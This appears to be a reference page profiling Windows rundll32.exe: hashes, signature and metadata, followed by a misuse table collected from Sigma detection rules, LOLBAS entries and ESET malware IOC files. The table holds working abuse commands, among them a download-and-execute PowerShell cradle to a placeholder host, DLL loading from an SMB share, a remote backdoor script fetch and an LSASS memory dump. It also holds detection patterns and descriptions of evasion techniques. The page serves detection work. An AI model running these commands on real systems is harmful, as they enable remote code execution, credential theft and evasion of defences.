rundll32.exe

  • File Path: C:\Windows\SysWOW64\rundll32.exe
  • Description: Windows host process (Rundll32)

Hashes

Type Hash
MD5 111474C61232202B5B588D2B512CBB25
SHA1 E9BF6CAAF1A4A146BF3FB94D986666DECCCD7537
SHA256 D25FF1E6C6460A7F9DE39198D182058C1712726008D187E1953B83ABE977E4A0
SHA384 DDCF8D03C777B8A01E6AC89FA5BA774C4B18FE19C3BC9F6C59F99001B788E5FF8C2CDA8C7800F8307209F01FF68EA954
SHA512 05E3F4A3683E67CB5DD7E434E3619CBF04103B1907A18B04B61F06013FA1F925BA9E279509FB2DF6B738E35D136E44121008980EF33E4F55AB480DD9B440427D
SSDEEP 1536:557g1LwvkpZruNJosIB/ROln5IUmDjoXp:5MtjCNysI9ROln5I0

Signature

  • Status: Signature verified.
  • Serial: 33000000BCE120FDD27CC8EE930000000000BC
  • Thumbprint: E85459B23C232DB3CB94C7A56D47678F58E8E51E
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: RUNDLL32.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.14393.0 (rs1_release.160715-1616)
  • Product Version: 10.0.14393.0
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\rundll32.exe 40
C:\windows\system32\rundll32.exe 49
C:\Windows\system32\rundll32.exe 44
C:\Windows\system32\rundll32.exe 41
C:\Windows\system32\rundll32.exe 38
C:\WINDOWS\system32\rundll32.exe 44
C:\Windows\SysWOW64\rundll32.exe 44
C:\Windows\SysWOW64\rundll32.exe 43
C:\Windows\SysWOW64\rundll32.exe 41
C:\windows\SysWOW64\rundll32.exe 54
C:\WINDOWS\SysWOW64\rundll32.exe 44

Possible Misuse

The following table contains possible examples of rundll32.exe being misused. While rundll32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma win_invoke_obfuscation_via_rundll_services.yml ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma win_invoke_obfuscation_via_rundll_services_security.yml ServiceFileName|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services.yml ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services_security.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services_security.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services_security.yml ServiceFileName|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' DRL 1.0
sigma win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml - 'rundll32' DRL 1.0
sigma win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml - 'rundll32' DRL 1.0
sigma win_user_driver_loaded.yml - '\Windows\System32\rundll32.exe' DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml title: PowerShell Rundll32 Remote Thread Creation DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml description: Detects PowerShell remote thread creation in Rundll32.exe DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml TargetImage|endswith: '\rundll32.exe' DRL 1.0
sigma driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml - 'rundll32' DRL 1.0
sigma sysmon_creation_system_file.yml - '\rundll32.exe' DRL 1.0
sigma sysmon_mimikatz_inmemory_detection.yml Image: 'C:\Windows\System32\rundll32.exe' DRL 1.0
sigma sysmon_suspicious_dbghelp_dbgcore_load.yml - '\rundll32.exe' DRL 1.0
sigma sysmon_rundll32_net_connections.yml title: Rundll32 Internet Connection DRL 1.0
sigma sysmon_rundll32_net_connections.yml description: Detects a rundll32 that communicates with public IP addresses DRL 1.0
sigma sysmon_rundll32_net_connections.yml Image|endswith: '\rundll32.exe' DRL 1.0
sigma powershell_invoke_obfuscation_via_rundll.yml Payload|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32.yml Payload|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' DRL 1.0
sigma powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml ScriptBlockText|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml ScriptBlockText|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' DRL 1.0
sigma powershell_suspicious_keywords.yml - "rundll32" DRL 1.0
sigma sysmon_lsass_dump_comsvcs_dll.yml description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. DRL 1.0
sigma sysmon_lsass_dump_comsvcs_dll.yml SourceImage: 'C:\Windows\System32\rundll32.exe' DRL 1.0
sigma process_creation_c3_load_by_rundll32.yml title: F-Secure C3 Load by Rundll32 DRL 1.0
sigma process_creation_c3_load_by_rundll32.yml - 'rundll32.exe' DRL 1.0
sigma process_creation_cobaltstrike_load_by_rundll32.yml title: CobaltStrike Load by Rundll32 DRL 1.0
sigma process_creation_cobaltstrike_load_by_rundll32.yml description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. DRL 1.0
sigma process_creation_cobaltstrike_load_by_rundll32.yml - 'rundll32.exe' DRL 1.0
sigma process_creation_lolbins_by_office_applications.yml - 'rundll32' DRL 1.0
sigma process_creation_lolbins_with_wmiprvse_parent_process.yml - 'rundll32' DRL 1.0
sigma process_creation_office_from_proxy_executing_regsvr32_payload.yml - 'rundll32' DRL 1.0
sigma process_creation_office_from_proxy_executing_regsvr32_payload2.yml - '*rundll32*' DRL 1.0
sigma sysmon_susp_webdav_client_execution.yml description: A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server). DRL 1.0
sigma sysmon_susp_webdav_client_execution.yml Image|endswith: '\rundll32.exe' DRL 1.0
sigma sysmon_vmtoolsd_susp_child_process.yml - '\rundll32.exe' DRL 1.0
sigma win_apt_equationgroup_dll_u_load.yml Image|endswith: '\rundll32.exe' DRL 1.0
sigma win_apt_lazarus_activity_apr21.yml - 'C:\Windows\System32\rundll32.exe' DRL 1.0
sigma win_apt_lazarus_loader.yml - 'rundll32.exe ' DRL 1.0
sigma win_apt_sofacy.yml - 'rundll32.exe' DRL 1.0
sigma win_apt_taidoor.yml - 'rundll32.exe' DRL 1.0
sigma win_apt_unc2452_cmds.yml - 'rundll32.exe' DRL 1.0
sigma win_apt_unc2452_cmds.yml ParentImage|endswith: '\rundll32.exe' DRL 1.0
sigma win_apt_unc2452_cmds.yml - 'rundll32 c:\windows\' DRL 1.0
sigma win_apt_unc2452_ps.yml - 'rundll32 c:\windows' DRL 1.0
sigma win_apt_unc2452_ps.yml - 'process call create "rundll32 c:\windows' DRL 1.0
sigma win_apt_zxshell.yml - '\rundll32.exe' DRL 1.0
sigma win_bad_opsec_sacrificial_processes.yml description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' DRL 1.0
sigma win_bad_opsec_sacrificial_processes.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 DRL 1.0
sigma win_bad_opsec_sacrificial_processes.yml Image|endswith: '\rundll32.exe' DRL 1.0
sigma win_bad_opsec_sacrificial_processes.yml CommandLine|endswith: '\rundll32.exe' DRL 1.0
sigma win_crime_fireball.yml description: Detects Archer malware invocation via rundll32 DRL 1.0
sigma win_crime_fireball.yml - 'rundll32.exe' DRL 1.0
sigma win_html_help_spawn.yml - '\rundll32.exe' DRL 1.0
sigma win_impacket_lateralization.yml # runs %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe DRL 1.0
sigma win_invoke_obfuscation_via_rundll.yml CommandLine|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32.yml CommandLine|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' DRL 1.0
sigma win_malware_notpetya.yml Image|endswith: '\rundll32.exe' DRL 1.0
sigma win_malware_trickbot_wermgr.yml description: Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe DRL 1.0
sigma win_malware_trickbot_wermgr.yml - '\rundll32.exe' DRL 1.0
sigma win_meterpreter_or_cobaltstrike_getsystem_service_start.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma win_meterpreter_or_cobaltstrike_getsystem_service_start.yml - 'rundll32' DRL 1.0
sigma win_office_shell.yml - '\rundll32.exe' DRL 1.0
sigma win_powershell_dll_execution.yml - '\rundll32.exe' DRL 1.0
sigma win_powershell_dll_execution.yml - 'Windows-Hostprozess (Rundll32)' DRL 1.0
sigma win_process_dump_rundll32_comsvcs.yml title: Process Dump via Rundll32 and Comsvcs.dll DRL 1.0
sigma win_redmimicry_winnti_proc.yml - rundll32.exe DRL 1.0
sigma win_renamed_binary.yml - 'rundll32.exe' DRL 1.0
sigma win_renamed_binary.yml - '\rundll32.exe' DRL 1.0
sigma win_renamed_binary_highly_relevant.yml - "rundll32.exe" DRL 1.0
sigma win_renamed_binary_highly_relevant.yml - '\rundll32.exe' DRL 1.0
sigma win_rundll32_without_parameters.yml title: Rundll32 Without Parameters DRL 1.0
sigma win_rundll32_without_parameters.yml description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module DRL 1.0
sigma win_rundll32_without_parameters.yml CommandLine: 'rundll32.exe' DRL 1.0
sigma win_script_event_consumer_spawn.yml - '\rundll32.exe' DRL 1.0
sigma win_shell_spawn_susp_program.yml - '\rundll32.exe' DRL 1.0
sigma win_susp_child_process_as_system_.yml Image|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_comsvcs_procdump.yml description: Detects process memory dump via comsvcs.dll and rundll32 DRL 1.0
sigma win_susp_comsvcs_procdump.yml Image|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_comsvcs_procdump.yml OriginalFileName: 'RUNDLL32.EXE' DRL 1.0
sigma win_susp_control_dll_load.yml description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits DRL 1.0
sigma win_susp_control_dll_load.yml Image|endswith: '\rundll32.exe ' DRL 1.0
sigma win_susp_curl_start_combo.yml - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 DRL 1.0
sigma win_susp_emotet_rudll32_execution.yml title: Emotet RunDLL32 Process Creation DRL 1.0
sigma win_susp_emotet_rudll32_execution.yml description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,#1 DRL 1.0
sigma win_susp_emotet_rudll32_execution.yml - '\rundll32.exe' DRL 1.0
sigma win_susp_emotet_rudll32_execution.yml - '\tracker.exe' #When Visual Studio compile NodeJS program, it might use MSBuild to create tracker.exe and then, the tracker.exe fork rundll32.exe DRL 1.0
sigma win_susp_odbcconf.yml Image|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_pcwutl.yml Image|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_powershell_parent_process.yml - '\rundll32.exe' DRL 1.0
sigma win_susp_rundll32_activity.yml title: Suspicious Rundll32 Activity DRL 1.0
sigma win_susp_rundll32_activity.yml description: Detects suspicious process related to rundll32 based on arguments DRL 1.0
sigma win_susp_rundll32_by_ordinal.yml description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal DRL 1.0
sigma win_susp_rundll32_by_ordinal.yml - '\rundll32.exe' DRL 1.0
sigma win_susp_rundll32_inline_vbs.yml title: Suspicious Rundll32 Invoking Inline VBScript DRL 1.0
sigma win_susp_rundll32_inline_vbs.yml description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 DRL 1.0
sigma win_susp_rundll32_inline_vbs.yml - 'rundll32.exe' DRL 1.0
sigma win_susp_rundll32_no_params.yml title: Suspicious Rundll32 Without Any CommandLine Params DRL 1.0
sigma win_susp_rundll32_no_params.yml description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity DRL 1.0
sigma win_susp_rundll32_no_params.yml CommandLine|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_rundll32_setupapi_installhinfsection.yml title: Suspicious Rundll32 Setupapi.dll Activity DRL 1.0
sigma win_susp_rundll32_setupapi_installhinfsection.yml ParentImage|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_rundll32_sys.yml title: Suspicious Rundll32 Activity Invoking Sys File DRL 1.0
sigma win_susp_rundll32_sys.yml description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 DRL 1.0
sigma win_susp_rundll32_sys.yml CommandLine|contains: 'rundll32.exe' DRL 1.0
sigma win_susp_servu_process_pattern.yml - '\rundll32.exe' DRL 1.0
sigma win_susp_shimcache_flush.yml - 'rundll32' DRL 1.0
sigma win_susp_spoolsv_child_processes.yml Image|endswith: \rundll32.exe DRL 1.0
sigma win_susp_spoolsv_child_processes.yml CommandLine|endswith: rundll32.exe DRL 1.0
sigma win_susp_wmic_proc_create_rundll32.yml title: Suspicious WMI Execution Using Rundll32 DRL 1.0
sigma win_susp_wmic_proc_create_rundll32.yml description: Detects WMI executing rundll32 DRL 1.0
sigma win_susp_wmic_proc_create_rundll32.yml - 'rundll32' DRL 1.0
sigma win_system_exe_anomaly.yml - '\rundll32.exe' DRL 1.0
sigma sysmon_modify_screensaver_binary_path.yml - '\rundll32.exe' DRL 1.0
sigma driver_load_invoke_obfuscation_via_rundll_services.yml ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_rundll32_services.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_rundll32_services.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_rundll32_services.yml ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' DRL 1.0
sigma win_possible_privilege_escalation_using_rotten_potato.yml Image|endswith: '\rundll32.exe' DRL 1.0
LOLBAS Dfsvc.yml - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo  
LOLBAS Rundll32.yml Name: Rundll32.exe  
LOLBAS Rundll32.yml - Command: rundll32.exe AllTheThingsx64,EntryPoint  
LOLBAS Rundll32.yml - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.  
LOLBAS Rundll32.yml - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).  
LOLBAS Rundll32.yml - Command: rundll32.exe -sta {CLSID}  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.  
LOLBAS Rundll32.yml - Path: C:\Windows\System32\rundll32.exe  
LOLBAS Rundll32.yml - Path: C:\Windows\SysWOW64\rundll32.exe  
LOLBAS Rundll32.yml - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/  
LOLBAS Rundll32.yml - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md  
LOLBAS Advpack.yml Description: Utility for installing software and drivers with rundll32.exe  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,RegisterOCX test.dll  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe  
LOLBAS Advpack.yml - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"  
LOLBAS comsvcs.yml - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe  
LOLBAS Ieadvpack.yml - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"  
LOLBAS Ieframe.yml - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"  
LOLBAS Mshtml.yml - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"  
LOLBAS Pcwutl.yml - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe  
LOLBAS Setupapi.yml - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf  
LOLBAS Setupapi.yml - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf  
LOLBAS Shdocvw.yml - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"  
LOLBAS Shell32.yml - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll  
LOLBAS Shell32.yml - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe  
LOLBAS Shell32.yml - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"  
LOLBAS Syssetup.yml - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf  
LOLBAS Syssetup.yml - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf  
LOLBAS Url.yml - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta"  
LOLBAS Url.yml - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"  
LOLBAS Url.yml - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta  
LOLBAS Zipfldr.yml - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe  
LOLBAS Zipfldr.yml - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e  
malware-ioc misp-dukes-operation-ghost-event.json "value": "Rundll32 - T1085", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "tag_name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc invisimole.yar $s13 = "rundll32.exe \"%s\",StartUI" © ESET 2014-2018
malware-ioc misp_invisimole.json "value": "%WINDIR%\\SysWOW64\\drivers\\Rundll32.exe", © ESET 2014-2018
malware-ioc misp_invisimole.json "value": "Rundll32 - T1085", © ESET 2014-2018
malware-ioc misp_invisimole.json "tag_name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)\n\nAnother bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.\n\nOne variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.\n\nA third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named <code>March 25 \\u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. \n\nAdversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.(Citation: Threatexpress MetaTwin 2017)\n\n### Windows\nIn another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)\n\nAn example of abuse of trusted locations in Windows would be the <code>C:\\Windows\\System32</code> directory. Examples of trusted binary names that can be given to malicious binares include \"explorer.exe\" and \"svchost.exe\".\n\n### Linux\nAnother variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)\n\nAn example of abuse of trusted locations in Linux would be the <code>/bin</code> directory. Examples of trusted binary names that can be given to malicious binaries include \"rsyncd\" and \"dbus-inotifier\". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)", © ESET 2014-2018
malware-ioc misp_invisimole.json "name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc invisimole %WINDIR%\SysWOW64\drivers\Rundll32.exe © ESET 2014-2018
